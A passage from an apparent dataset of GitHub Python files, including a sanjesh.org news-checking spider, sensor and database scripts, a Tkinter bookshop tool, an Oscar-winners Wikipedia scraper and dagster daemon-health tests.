hours\"))\n print(f\"response number: {self.counter}\")\n top_links = response.css('div .topLinks')\n for top in top_links:\n if 'ارشد' in top.xpath('./div[2]/h4/text()').get():\n img_new = top.xpath('./div[4]/ul/li[1]/a/img/@src').get()\n message = top.xpath('./div[4]/ul/li[1]/a/text()').get()\n if message == self.last_message:\n break\n if img_new is None:\n print(\"hey: noting\")\n self.logger.info(f\"hey: noting\")\n else:\n self.last_message = message\n print(f\"hey: have news: {message}\")\n self.logger.info(f\"hey: have news: {message}\")\n self.send_mail(self.create_mail_message('have news in sanjesh', message))\n break\n yield response.follow(url=\"http://sanjesh.org/\", callback=self.parse, dont_filter=True, errback=self.err_back)\n\n def err_back(self, failure):\n self.logger.info(f\"request failed, count:{self.counter}\")\n yield scrapy.Request(url=\"http://sanjesh.org/\", callback=self.parse, dont_filter=True, errback=self.err_back)\n\n def send_mail(self, message):\n try:\n print(\"create email instance\")\n smtp = smtplib.SMTP('localhost')\n smtp.login(self._from, '*************************************************************')\n smtp.sendmail(self._from, self._to, message)\n smtp.close()\n print(\"success\")\n except Exception as e:\n print(e)\n\n def create_mail_message(self, subject, body):\n return f\"From: {self._from}\\nTo: {self._to}\\nSubject: {subject}\\n\\n{body}\"\n","repo_name":"MostafaGhanbari9176/sanjesh-checker","sub_path":"reminder/spiders/sanjesh.py","file_name":"sanjesh.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6202380013","text":"# -*- coding: utf-8 -*-\n\nimport happybase\nfrom pymongo import MongoClient\n\nfrom settings import (\n mongo_refer_db, mongo_uri, mongo_portrait_db,\n thrift_server_ip, thrift_server_port, mongo_uri_down\n)\n\nconn_refer = MongoClient(mongo_uri, connect=False)\ndb = conn_refer[mongo_refer_db]\n\nconn = MongoClient(mongo_uri_down, connect=False)\nportrait = conn[mongo_portrait_db]\n\nhbase_pool = happybase.ConnectionPool(\n size=10, host=thrift_server_ip,\n port=thrift_server_port, timeout=5000\n)\n","repo_name":"leolinf/flask-demo","sub_path":"querier/utils/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12952663423","text":"import minimalmodbus\nimport time\n\n\nmb_address = 1 # modbus address as per manual\n\nnpk_sensor = minimalmodbus.Instrument('/dev/ttyUSB0', mb_address)\n\n# As per device specifications\nnpk_sensor.serial.baudrate = 9600\nnpk_sensor.serial.bytesize = 8\nnpk_sensor.serial.parity = minimalmodbus.serial.PARITY_NONE\nnpk_sensor.serial.stopbits = 1\nnpk_sensor.serial.timeout = 0.5\nnpk_sensor.mode = minimalmodbus.MODE_RTU\n\nnpk_sensor.clear_buffers_before_each_transaction = True\nnpk_sensor.close_port_after_each_call = True\n\n# One Register\n# single_data = npk_sensor.read_register(30, 0, 3)\n# print(f\"Raw Data is {single_data}\")\n\n# We want to constantly be getting data from the sensor\n\n# Multiple Regs\n# read_registers(register address, number of registers to be read, function code)\ndata = npk_sensor.read_registers(30, 3, 3)\n\ndef get_npk_nit():\n\tnitrogen = data[0]\n\ttime.sleep(1)\n\t\n\treturn nitrogen\n\ndef get_npk_phos():\n\tphosphorus = data[1]\n\ttime.sleep(1)\n\n\treturn phosphorus\n\ndef get_npk_pot():\n\tpotassium = data[2]\n\ttime.sleep(1)\n\n\treturn potassium\n\n\n","repo_name":"jawadahmed2/Plant-Health-Prediction-From-Sensors-Data","sub_path":"ceres_ydg/hw/src/sensors/NPK_CD.py","file_name":"NPK_CD.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34675214935","text":"import requests\nimport mysql.connector\nfrom datetime import datetime\n\nconn = mysql.connector.connect(user='root', password='password', host='localhost', database='starwars')\nc = conn.cursor()\n\nurl = 'https://swapi.dev/api/species'\nwhile url:\n response = requests.get(url)\n data = response.json()\n for species in data['results']:\n created = datetime.strptime(species['created'], \"%Y-%m-%dT%H:%M:%S.%fZ\")\n edited = datetime.strptime(species['edited'], \"%Y-%m-%dT%H:%M:%S.%fZ\")\n insert_species = (\n \"INSERT INTO species (name, classification, designation, average_height, skin_colors, hair_colors, eye_colors, average_lifespan, homeworld, language, created, edited, url) \"\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n )\n species_data = (\n species['name'], \n species['classification'], \n species['designation'], \n species['average_height'] if species['average_height'] != 'unknown' else None, \n species['skin_colors'], \n species['hair_colors'], \n species['eye_colors'], \n species['average_lifespan'] if species['average_lifespan'] != 'unknown' else None, \n species['homeworld'], \n species['language'], \n created,\n edited,\n species['url']\n )\n c.execute(insert_species, species_data)\n\n # Get the next page URL\n url = data['next']\n\nconn.commit()\nconn.close()\n","repo_name":"Shiido123/star-wars-python","sub_path":"species.py","file_name":"species.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2795955045","text":"import keyboard\nfrom terminaltables import AsciiTable\n\nstock = [\n [\"Article\", \"Pointure(EUR)\", \"Prix(€)\"],\n [\"Asics Gel 2000\", 42, 119.00],\n [\"Asics Gel 2000\", 39, 119.00],\n [\"Mizuno Wave Rider\", 38, 129.00],\n [\"Nike Air Zoom\", 42, 125.00],\n [\"Mizuno Wave plus\", 39, 83.40],\n [\"Mizuno Wave plus\", 40, 83.40],\n [\"Mizuno Wave plus\", 41, 83.40],\n [\"Merrel Poseidon\", 39, 118.30]\n]\n\n\ndef wait_for_input():\n global inp_val, inp\n inp = False\n while inp == False:\n inp_val = keyboard.read_key()\n if inp_val == \"à\" or inp_val == \"&\" or inp_val == \"é\" or inp_val == '\"' or inp_val == \"'\" or inp_val == \"(\" or inp_val == \"-\" or inp_val == \"0\" or inp_val == \"1\" or inp_val == \"2\" or inp_val == \"3\" or inp_val == \"4\" or inp_val == \"5\" or inp_val == \"6\":\n inp = True\n break\n\n\ndef reset():\n global inp_val\n inp_val = \"\"\n\n\n\nrun = True\nwhile run:\n\n print(\"\\n1 : Afficher les articles pour une pointure\"\n \"\\n2 : Afficher les articles présents plusieurs fois\"\n \"\\n3 : Afficher les articles pour chaque pointure\"\n \"\\n4 : Afficher la pointure la plus présente\"\n \"\\n5 : Afficher le nombre de fois la pointure la plus présente\"\n \"\\n6 : Afficher l’article le plus cher\"\n \"\\n0 : Quitter le programme\")\n\n wait_for_input()\n\n if inp_val == \"0\" or inp_val == \"à\":\n print(\"\\nFin du programme ...\")\n break\n\n elif inp_val == \"1\" or inp_val == \"&\":\n print(\"\\n1\")\n reset()\n\n elif inp_val == \"2\" or inp_val == \"é\":\n print(\"\\n\")\n table = AsciiTable(stock)\n print(table.table)\n reset()\n\n elif inp_val == \"3\" or inp_val == '\"':\n print(\"\\n3\")\n reset()\n elif inp_val == \"4\" or inp_val == \"'\":\n print(\"\\n4\")\n reset()\n elif inp_val == \"5\" or inp_val == \"(\":\n print(\"\\n5\")\n reset()\n elif inp_val == \"6\" or inp_val == \"-\":\n print(\"\\n6\")\n reset()\n","repo_name":"nescapp/school-shit-21-22","sub_path":"prj1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21098975971","text":"#Chaos program, (in chapter 1) desgined to show how chaotic results can arise from simple starting conditions\r\n#By Dana Lockwood (9/28/17)\r\n\r\ndef main():#define the function\r\n print(\"This program illustrates a chaotic function\")\r\n x=eval(input(\"Enter a number between zero and 1\"))\r\n for i in range(10):\r\n x=3.9 * x * (1-x) #define the equation\r\n print(x)\r\n\r\nmain()\r\n","repo_name":"D-Bits/Python-Practice","sub_path":"Practice/9-28/chaos-program_Dana.py","file_name":"chaos-program_Dana.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13461702776","text":"import matplotlib.pyplot as plt\nfrom wordcloud import WordCloud\n\ndef positive_review(norm_train_reviews):\n plt.figure(figsize=(10, 10))\n positive_text = norm_train_reviews[1]\n WC = WordCloud(width=1000, height=500, max_words=500, min_font_size=5)\n positive_words = WC.generate(positive_text)\n plt.imshow(positive_words, interpolation='bilinear')\n plt.show()\n\ndef negative_review(norm_train_reviews):\n plt.figure(figsize=(10, 10))\n negative_text = norm_train_reviews[8]\n WC = WordCloud(width=1000, height=500, max_words=500, min_font_size=5)\n negative_words = WC.generate(negative_text)\n plt.imshow(negative_words, interpolation='bilinear')\n plt.show()","repo_name":"AndreasPatsimas/Movies-Data-Mining","sub_path":"sentiment_analysis/world_cloud_reviews/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12422908212","text":"import tkinter as tk\nfrom tkinter import ttk\nimport sqlite3\nimport os\n\nimport supplier_db\nfrom text_processor import TextProcessor\nfrom school_order_organizer import SchoolOrderGUI\nfrom replenishment_optimizer_V3 import ReplenishmentOptimizer\nfrom sales_op_v2_bs import SalesReportOptimizer\nimport test_keep_v0\nimport buy_cal\n\nclass FlowOfBooks(tk.Tk):\n def __init__(self):\n super().__init__()\n # Create connection to the database\n db_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"orders.db\")\n self.conn = sqlite3.connect(db_path)\n self.orders_conn = sqlite3.connect('orders.db')\n\n print(f\"FlowOfBooks orders_db connection: {self.orders_conn}\")\n\n # Window settings\n self.title(\"Flow of Books\")\n self.geometry(\"400x400\")\n\n # Create main frame\n main_frame = tk.Frame(self, width=560, height=420)\n main_frame.place(relx=0.5, rely=0.5, anchor=\"center\")\n\n # Create buttons for parent directories\n btn_style = ttk.Style()\n btn_style.configure('big.TButton', font=('Arial', 20))\n\n upstream_btn = ttk.Button(main_frame, text=\"Upstream\", style='big.TButton', command=self.show_upstream_menu)\n upstream_btn.pack(fill=\"both\", expand=True)\n midstream_btn = ttk.Button(main_frame, text=\"Mid-Stream\", style='big.TButton', command=self.show_midstream_menu)\n midstream_btn.pack(fill=\"both\", expand=True)\n downstream_btn = ttk.Button(main_frame, text=\"Downstream\", style='big.TButton', command=self.show_downstream_menu)\n downstream_btn.pack(fill=\"both\", expand=True)\n\n def show_upstream_menu(self):\n # Create Upstream menu\n upstream_menu = tk.Menu(self, tearoff=0)\n\n # Add Supplier submenu\n supplier_submenu = tk.Menu(upstream_menu, tearoff=0)\n supplier_submenu.add_command(label=\"Missing Shipment Tracker\")\n supplier_submenu.add_command(label=\"Supplier Contact DB\", command=supplier_db.main)\n upstream_menu.add_cascade(label=\"Supplier\", menu=supplier_submenu)\n\n # Add Product submenu\n product_submenu = tk.Menu(upstream_menu, tearoff=0)\n product_submenu.add_command(label=\"Text Processor\", command=self.open_text_processor)\n product_submenu.add_command(label=\"Buying Calculator\", command=buy_cal.main)\n upstream_menu.add_cascade(label=\"Product\", menu=product_submenu)\n\n # Show menu\n self.show_menu(upstream_menu)\n\n def show_midstream_menu(self):\n # Create Mid-Stream menu\n midstream_menu = tk.Menu(self, tearoff=0)\n midstream_menu.add_command(label=\"Project Manager\", command=test_keep_v0.main)\n midstream_menu.add_command(label=\"Book Catalog\")\n\n # Show menu\n self.show_menu(midstream_menu)\n\n def show_downstream_menu(self):\n # Create Downstream menu\n downstream_menu = tk.Menu(self, tearoff=0)\n\n # Add Customer submenu\n customer_submenu = tk.Menu(downstream_menu, tearoff=0)\n customer_submenu.add_command(label=\"Customer Order Organizer\", command=self.open_customer_order_app)\n downstream_menu.add_cascade(label=\"Customer\", menu=customer_submenu)\n\n # Add Shops submenu\n shop_submenu = tk.Menu(downstream_menu, tearoff=0)\n shop_submenu.add_command(label=\"Replenishment Optimizer\", command=self.open_replenishment_optimizer)\n shop_submenu.add_command(label=\"Sales Report Optimizer\",\n command=self.open_sales_report_optimizer) # Add this line\n downstream_menu.add_cascade(label=\"Shops\", menu=shop_submenu)\n\n # Add School Order Organizer\n downstream_menu.add_command(label=\"School Order Organizer\", command=self.open_school_order_organizer)\n\n # Show menu\n self.show_menu(downstream_menu)\n\n def show_menu(self, menu):\n x, y = self.winfo_pointerxy()\n menu.post(x, y)\n\n def open_text_processor(self):\n TextProcessor()\n\n def open_school_order_organizer(self):\n SchoolOrderGUI(tk.Toplevel())\n\n def open_replenishment_optimizer(self):\n ReplenishmentOptimizer()\n\n def open_sales_report_optimizer(self):\n SalesReportOptimizer()\n\n def open_customer_order_app(self):\n customer_order_window = tk.Toplevel(self)\n customer_order_app = CustomerOrderApp(customer_order_window, self.orders_conn)\n\n\n\nif __name__ == \"__main__\":\n app = FlowOfBooks()\n app.mainloop()\n\n\n","repo_name":"robinpchan/FlowofBooks","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27604410056","text":"\n# coding: utf-8\n\n# In[1]:\n\n# This project involves using Beautiful Soup to extract information relating to Oscar winners from Wikipedia pages. In total \n# six different pages will be accessed in order to obtain the following:\n# 1. Best Picture \n# 2. Best Director\n# 3. Best Actor\n# 4. Best Actress\n# 5. Best Supporting Actor\n# 6. Best Supporting Actress\n# Once the data has been retrieved from each page, it will be stored in dataframes. I will then connect to MySQL, create tables\n# and insert the data there. Finally I will run queries on the database to provide useful insight.\n\n\n# In[2]:\n\nimport pandas as pd # For creating dataframes\n\n\n# In[3]:\n\n# Import functions from file\nfrom functions import loadPage, extractYears, extractFilmData\n\n\n# In[4]:\n\n# Page 1- Best Picture\n# Call function to read in URL and retrieve data from the page\ndata = loadPage(\"https://en.wikipedia.org/wiki/Academy_Award_for_Best_Picture\")\n# From the data get all the tables that have the following class\ntables = data.findAll(\"table\", class_= \"wikitable\")\n\n\n# In[5]:\n\n# Call function to get the film data from tables\ndata = extractFilmData(\"picture\", tables)\n# Create lists from the dictionary columns\nfilms = data[\"films\"]\nproducer = data[\"names\"]\n# Call function to get a list of years from tables\nyears = extractYears(\"picture\", tables)\n\n\n# In[6]:\n\n# Check the length of each list. They are all the same length.\nprint(len(films))\nprint(len(producer))\nprint(len(years))\n\n\n# In[7]:\n\n# Create a data frame for storing each Best Picture Winner\ndf_picture = pd.DataFrame()\ndf_picture[\"Year\"] = pd.to_numeric(years, errors='coerce')\ndf_picture[\"Film\"] = films\ndf_picture[\"Producers\"] = producer\n# Show the dataframe\ndf_picture\n\n\n# In[8]:\n\n# Page2 - Best Director\ndata = loadPage(\"https://en.wikipedia.org/wiki/Academy_Award_for_Best_Director\")\ntables = data.findAll(\"table\", class_= \"wikitable sortable\")\n\n\n# In[9]:\n\ndata = extractFilmData(\"director\", tables)\nfilms = data[\"films\"]\ndirectors = data[\"names\"]\nyears = extractYears(\"director\", tables)\n\n\n# In[10]:\n\n# Check the length of each list. Due to the 1st Oscars having multiple awards they are not the same length\nprint(len(films))\nprint(len(directors))\nprint(len(years))\n\n\n# In[11]:\n\n# To amend this lets insert a year at the position 1 with the same value as the year at position 0\nyears.insert(1, years[0])\n\n\n# In[12]:\n\n# Now they are all the same length\nprint(len(films))\nprint(len(directors))\nprint(len(years))\n\n\n# In[13]:\n\ndf_directors = pd.DataFrame()\ndf_directors[\"Year\"] = pd.to_numeric(years, errors='coerce')\ndf_directors[\"Director\"] = directors\ndf_directors[\"Film\"] = films\n# Look at the data frame and see the first two indexes have the same year.\ndf_directors\n\n\n# In[14]:\n\n# Page 3- Best Actor\ndata = loadPage(\"https://en.wikipedia.org/wiki/Academy_Award_for_Best_Actor\")\ntables = data.findAll(\"table\", class_= \"wikitable sortable\")\n\n\n# In[15]:\n\ndata = extractFilmData(\"actor\", tables)\nfilms = data[\"films\"]\nactors = data[\"names\"]\nyears = extractYears(\"actor\", tables)\n\n\n# In[16]:\n\n# Check the length of each list. They are not the same length. There are two reasons for this.\n# 1. In the 1st Oscars ceremony, the actor won awards for two films\n# 2. In 1932 there was a tie for 1st place\nprint(len(films))\nprint(len(actors))\nprint(len(years))\n\n\n# In[17]:\n\n# To amend this lets insert the actor at position 0 into position 1 and insert the appropriate years at position 1 and 6 of years\nactors.insert(1, actors[0])\nyears.insert(1, years[0])\nyears.insert(6, years[5])\n\n\n# In[18]:\n\n# Now they are all the same length\nprint(len(films))\nprint(len(actors))\nprint(len(years))\n\n\n# In[19]:\n\ndf_actors = pd.DataFrame()\ndf_actors[\"Year\"] = pd.to_numeric(years, errors='coerce')\ndf_actors[\"Actor\"] = actors\ndf_actors[\"Film\"] = films\n# Show the dataframe and look at years 1928 and 1932\ndf_actors\n\n\n# In[20]:\n\n# Page 4- Best Actress\ndata = loadPage(\"https://en.wikipedia.org/wiki/Academy_Award_for_Best_Actress\")\ntables = data.findAll(\"table\", class_= \"wikitable sortable\")\n\n\n# In[21]:\n\ndata = extractFilmData(\"actress\", tables)\nfilms = data[\"films\"]\nactresses = data[\"names\"]\nyears = extractYears(\"actress\", tables)\n\n\n# In[22]:\n\n# Check the length of each list. They are not the same. There are two reasons for this.\n# 1. In the 1st Oscars the actress won awards for three films\n# 2. In 1968 there was a tie for 1st place\nprint(len(actresses))\nprint(len(films))\nprint(len(years))\n\n\n# In[23]:\n\n# Lets amend this by inserting the actress at the position 0 to positions 1 and 2. Do the same for the years\n# Also insert the year at position 40 into position 41\nactresses.insert(1, actresses[0])\nactresses.insert(2, actresses[1])\nyears.insert(41, years[40])\nyears.insert(1, years[0])\nyears.insert(2, years[1])\n\n\n# In[24]:\n\n# Now they are all the same length\nprint(len(actresses))\nprint(len(films))\nprint(len(years))\n\n\n# In[25]:\n\ndf_actresses = pd.DataFrame()\ndf_actresses[\"Year\"] = pd.to_numeric(years, errors='coerce')\ndf_actresses[\"Actress\"] = actresses\ndf_actresses[\"Film\"] = films\n# Show the dataframe and look at the first three rows which have the same year and actress but different films\ndf_actresses\n\n\n# In[26]:\n\n# Now check the year 1968 and see two actresses and two films\ndf_actresses.loc[df_actresses['Year'] == 1968]\n\n\n# In[27]:\n\n# Page 5 - Best Supporting Actor\ndata = loadPage(\"https://en.wikipedia.org/wiki/Academy_Award_for_Best_Supporting_Actor\")\ntables = data.findAll(\"table\", class_= \"wikitable sortable\")\n\n\n# In[28]:\n\ndata = extractFilmData(\"supporting actor\", tables)\nfilms = data[\"films\"]\nactors = data[\"names\"]\nyears = extractYears(\"supporting actor\", tables)\n\n\n# In[29]:\n\n# Check all lists are the same length, they are\nprint(len(actors))\nprint(len(films))\nprint(len(years))\n\n\n# In[30]:\n\ndf_supActors = pd.DataFrame()\ndf_supActors[\"Year\"] = pd.to_numeric(years, errors='coerce')\ndf_supActors[\"Actor\"] = actors\ndf_supActors[\"Film\"] = films\ndf_supActors\n\n\n# In[31]:\n\n# Page 6 - Best Supporting Actress\ndata = loadPage(\"https://en.wikipedia.org/wiki/Academy_Award_for_Best_Supporting_Actress\")\ntables = data.findAll(\"table\", class_= \"wikitable sortable\")\n\n\n# In[32]:\n\ndata = extractFilmData(\"supporting actress\", tables)\nfilms = data[\"films\"]\nactresses = data[\"names\"]\nyears = extractYears(\"supporting actress\", tables)\n\n\n# In[33]:\n\n# Check all the lists are the same length, they are\nprint(len(actresses))\nprint(len(films))\nprint(len(years))\n\n\n# In[34]:\n\ndf_supActresses = pd.DataFrame()\ndf_supActresses[\"Year\"] = pd.to_numeric(years, errors='coerce')\ndf_supActresses[\"Actress\"] = actresses\ndf_supActresses[\"Film\"] = films\ndf_supActresses\n\n\n# In[35]:\n\n# Print the number of rows in each data frame\nprint(\"total best picture winners \" '{0}'.format(df_picture.shape[0]))\nprint(\"total best director winners \" '{0}'.format(df_directors.shape[0]))\nprint(\"total best actor winners \" '{0}'.format(df_actors.shape[0]))\nprint(\"total best actress winners \" '{0}'.format(df_actresses.shape[0]))\nprint(\"total best supp. actor winners \" '{0}'.format(df_supActors.shape[0]))\nprint(\"total best supp. actress winners \" '{0}'.format(df_supActresses.shape[0]))\n\n\n# In[36]:\n\n# Now all the data has been read into data frames, the next step is to connect to MYSQL and store it in the database\nfrom sqlalchemy import create_engine # For connecting to MySQL\nfrom MySQL_connect import config # Import connection parameters from file\n\n# Use the parameters to create connection variables\nuser = config['user']\npassword = config['password']\nhost = config['host']\ndb = config['db']\n\n# Connection object for MySQL\nengine = create_engine(\"mysql+mysqldb://\"+user+\":\"+password+\"@\"+host+\"/\"+db+\"?charset=utf8\")\n\n\n# In[37]:\n\n# Insert the data from each data frame into tables. If the table already exists overwrite it\ndf_picture.to_sql('winner_best_picture', con=engine, if_exists='replace', index_label='id')\ndf_directors.to_sql('winner_best_director', con=engine, if_exists='replace', index_label='id')\ndf_actors.to_sql('winner_best_actor', con=engine, if_exists='replace', index_label='id')\ndf_actresses.to_sql('winner_best_actress', con=engine, if_exists='replace', index_label='id')\ndf_supActors.to_sql('winner_best_supporting_actor', con=engine, if_exists='replace', index_label='id')\ndf_supActresses.to_sql('winner_best_supporting_actress', con=engine, if_exists='replace', index_label='id')\n\n\n# In[38]:\n\n# Show that the tables have been created\nres = engine.execute(\"SHOW TABLES\")\nfor x in res:\n print(x)\n\n\n# In[39]:\n\n# Now lets run some queries on the tables\n# First return the number of rows in each table\nnum_res = engine.execute(\"SELECT COUNT(*) FROM winner_best_picture\")\nprint(\"Best Picture number of rows\")\nfor x in num_res:\n print(x)\nnum_res = engine.execute(\"SELECT COUNT(*) FROM winner_best_director\")\nprint(\"Best Director number of rows\")\nfor x in num_res:\n print(x)\nnum_res = engine.execute(\"SELECT COUNT(*) FROM winner_best_actor\")\nprint(\"Best Actor number of rows\")\nfor x in num_res:\n print(x)\nnum_res = engine.execute(\"SELECT COUNT(*) FROM winner_best_actress\")\nprint(\"Best Actress number of rows\")\nfor x in num_res:\n print(x)\nnum_res = engine.execute(\"SELECT COUNT(*) FROM winner_best_supporting_actor\")\nprint(\"Best Supporting Actor number of rows\")\nfor x in num_res:\n print(x)\nnum_res = engine.execute(\"SELECT COUNT(*) FROM winner_best_supporting_actress\")\nprint(\"Best Supporting Actress number of rows\")\nfor x in num_res:\n print(x)\n\n\n# In[40]:\n\n# For displaying results in a table format\nfrom prettytable import PrettyTable \n\n\n# In[41]:\n\n# Query: Return a list of actors who have won an Oscar. In descending order of wins\n# Explained: We are using two tables - best_actor and best_supporting_actor. Therefore we use UNION inside a subquery to \n# combine the results of two queries into one set. Each query counts the total for each actor so we sum both totals to get \n# the total number of wins for each actor.\nactor_mostWins = engine.execute(\"SELECT actor, SUM(total_wins) AS total_wins FROM (SELECT actor, COUNT(actor) AS total_wins FROM winner_best_actor GROUP BY actor UNION SELECT actor, COUNT(actor) AS total_wins FROM winner_best_supporting_actor GROUP BY actor) AS res GROUP BY actor ORDER BY total_wins DESC, actor ASC\")\n\ntable = PrettyTable(['Actor', 'Wins'])\nfor x in actor_mostWins:\n table.add_row([x['actor'], x['total_wins']])\nprint(table)\n\n\n# In[42]:\n\n# Query: Return a list of actresses who have won an Oscar. In descending order of wins\n# Explained: We are using two tables - best_actress and best_supporting_actress. Therefore we use UNION inside a subquery to \n# combine the results of two queries into one set. Each query counts the total for each actress so we sum both totals to get \n# the total number of wins for each actress.\nactress_mostWins = engine.execute(\"SELECT actress, SUM(total_wins) AS total_wins FROM ( SELECT actress, COUNT(actress) AS total_wins FROM winner_best_actress GROUP BY actress UNION SELECT actress, COUNT(actress) AS total_wins FROM winner_best_supporting_actress GROUP BY actress) AS res GROUP BY actress ORDER BY total_wins DESC, actress ASC\")\n\ntable = PrettyTable(['Actress', 'Wins'])\nfor x in actress_mostWins:\n table.add_row([x['actress'], x['total_wins']])\nprint(table)\n\n\n# In[43]:\n\n# Query: Return a list of directors who have won an Oscar. In descending order of wins\n# Explained: Because the 1st Osars had winners in different categories we have to use substring to get rid of any brackets at\n# the end of any names. With the names correct we can now get the total for each director\ndirector_mostWins = engine.execute(\"SELECT director, SUM(num_wins) AS total_wins FROM (SELECT IF(SUBSTRING(director, LENGTH(director)) = ')', SUBSTRING(director, 1, POSITION('(' IN director) -1), director) AS director, COUNT( IF(SUBSTRING(director, LENGTH(director)) = ')', SUBSTRING(director, 1, POSITION('(' IN Director) -1), Director)) AS num_wins FROM winner_best_director GROUP BY Director ) AS res GROUP BY Director ORDER BY total_wins DESC, director ASC\");\n\ntable = PrettyTable(['Director', 'Wins'])\nfor x in director_mostWins:\n table.add_row([x['director'], x['total_wins']])\nprint(table)\n\n\n# In[44]:\n\n# Query: Return a list of best picture winning producers in descending order of total wins\n# Explained: This query is difficult because the producers column can have multiple names in it. We are interested in the first\n# name as that is usually the director. The names can be seperated by either commas or 'and' so we use search for the position \n# of the first comma. If a comma is found then use that as the maximum index for the substring. If not then search for the \n# position of ' and ' and use that as the maximum index. Finally return the substring and use it for the count.\npicture_mostWins = engine.execute(\"SELECT IF (POSITION(',' IN producers) > 0, SUBSTRING(producers, 1, POSITION(',' IN producers) -1) , IF(POSITION(' and ' IN producers) > 0, SUBSTRING(producers, 1, POSITION(' and ' IN producers)), producers) ) AS name, COUNT(producers) AS total_wins FROM winner_best_picture GROUP BY name ORDER BY total_wins DESC, name ASC\")\n\ntable = PrettyTable(['Producer', 'Wins'])\nfor x in picture_mostWins:\n table.add_row([x['name'], x['total_wins']])\nprint(table)\n\n","repo_name":"emmet-gingles/Jupyter-OscarWinners","sub_path":"Oscar_Winners.py","file_name":"Oscar_Winners.py","file_ext":"py","file_size_in_byte":13253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17889165817","text":"from .unit_waveforms import UnitWaveformsWidget\nfrom .base import to_attr\n\n\nclass UnitTemplatesWidget(UnitWaveformsWidget):\n # doc is copied from UnitWaveformsWidget\n\n def __init__(self, *args, **kargs):\n kargs[\"plot_waveforms\"] = False\n UnitWaveformsWidget.__init__(self, *args, **kargs)\n\n def plot_sortingview(self, data_plot, **backend_kwargs):\n import sortingview.views as vv\n from .utils_sortingview import generate_unit_table_view, make_serializable, handle_display_and_url\n\n dp = to_attr(data_plot)\n\n # ensure serializable for sortingview\n unit_id_to_channel_ids = dp.sparsity.unit_id_to_channel_ids\n unit_id_to_channel_indices = dp.sparsity.unit_id_to_channel_indices\n\n unit_ids, channel_ids = make_serializable(dp.unit_ids, dp.channel_ids)\n\n templates_dict = {}\n for u_i, unit in enumerate(unit_ids):\n templates_dict[unit] = {}\n templates_dict[unit][\"mean\"] = dp.templates[u_i].T.astype(\"float32\")[unit_id_to_channel_indices[unit]]\n templates_dict[unit][\"std\"] = dp.template_stds[u_i].T.astype(\"float32\")[unit_id_to_channel_indices[unit]]\n\n aw_items = [\n vv.AverageWaveformItem(\n unit_id=u,\n channel_ids=list(unit_id_to_channel_ids[u]),\n waveform=t[\"mean\"].astype(\"float32\"),\n waveform_std_dev=t[\"std\"].astype(\"float32\"),\n )\n for u, t in templates_dict.items()\n ]\n\n locations = {str(ch): dp.channel_locations[i_ch].astype(\"float32\") for i_ch, ch in enumerate(channel_ids)}\n v_average_waveforms = vv.AverageWaveforms(average_waveforms=aw_items, channel_locations=locations)\n\n if not dp.hide_unit_selector:\n v_units_table = generate_unit_table_view(dp.waveform_extractor.sorting)\n\n self.view = vv.Box(\n direction=\"horizontal\",\n items=[vv.LayoutItem(v_units_table, max_size=150), vv.LayoutItem(v_average_waveforms)],\n )\n else:\n self.view = v_average_waveforms\n\n self.url = handle_display_and_url(self, self.view, **backend_kwargs)\n\n\nUnitTemplatesWidget.__doc__ = UnitWaveformsWidget.__doc__\n","repo_name":"SpikeInterface/spikeinterface","sub_path":"src/spikeinterface/widgets/unit_templates.py","file_name":"unit_templates.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"9886760027","text":"import time\n\nimport pytest\nfrom dagster._core.scheduler import DagsterDaemonScheduler\nfrom dagster._daemon.daemon import SensorDaemon\nfrom dagster._daemon.types import DaemonHeartbeat\nfrom dagster._utils.error import SerializableErrorInfo\nfrom dagster_graphql.test.utils import execute_dagster_graphql\n\nfrom dagster_graphql_tests.graphql.graphql_context_test_suite import (\n ExecutingGraphQLContextTestMatrix,\n)\n\nINDIVIDUAL_DAEMON_QUERY = \"\"\"\nquery InstanceDetailSummaryQuery {\n instance {\n daemonHealth {\n id\n sensor: daemonStatus(daemonType: \"SENSOR\") {\n daemonType\n required\n healthy\n lastHeartbeatTime\n }\n run_coordinator: daemonStatus(daemonType: \"QUEUED_RUN_COORDINATOR\") {\n daemonType\n required\n healthy\n lastHeartbeatTime\n }\n scheduler: daemonStatus(daemonType: \"SCHEDULER\") {\n daemonType\n required\n healthy\n lastHeartbeatTime\n }\n }\n }\n}\n\"\"\"\n\nALL_DAEMON_QUERY = \"\"\"\nquery InstanceDetailSummaryQuery {\n instance {\n daemonHealth {\n id\n allDaemonStatuses {\n daemonType\n required\n healthy\n lastHeartbeatTime\n }\n }\n }\n}\n\"\"\"\n\nDAEMON_HEALTH_QUERY = \"\"\"\nquery InstanceDetailSummaryQuery {\n instance {\n daemonHealth {\n id\n sensor: daemonStatus(daemonType: \"SENSOR\"){\n lastHeartbeatErrors {\n message\n }\n healthy\n }\n }\n }\n}\n\"\"\"\n\n\nclass TestDaemonHealth(ExecutingGraphQLContextTestMatrix):\n def test_get_individual_daemons(self, graphql_context):\n if graphql_context.instance.is_ephemeral:\n pytest.skip(\"The daemon isn't compatible with an in-memory instance\")\n graphql_context.instance.add_daemon_heartbeat(\n DaemonHeartbeat(\n 